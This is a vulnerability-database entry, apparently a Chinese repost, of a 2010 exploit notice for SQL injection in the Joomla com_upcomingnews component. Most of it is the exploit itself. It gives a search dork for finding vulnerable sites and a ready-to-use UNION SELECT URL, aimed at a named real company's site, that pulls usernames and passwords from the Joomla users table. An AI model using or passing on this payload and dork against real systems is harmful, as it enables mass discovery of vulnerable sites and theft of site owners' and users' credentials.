The Joomla Upcoming News component remote SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051336 漏洞类型
发布时间 2010-01-23 更新时间 2010-01-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010010088
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#--------------------------------------------------------
#Joomla (com_upcomingnews) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Dork:inurl"com_upcomingnews"
#Exploit:
#--------
#Demo:
#http://www.zilog.com//index.php?option=com_upcomingnews&Itemid=147&headno=-37+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8+from+romweb.jos_users--
----------------------------------------------------------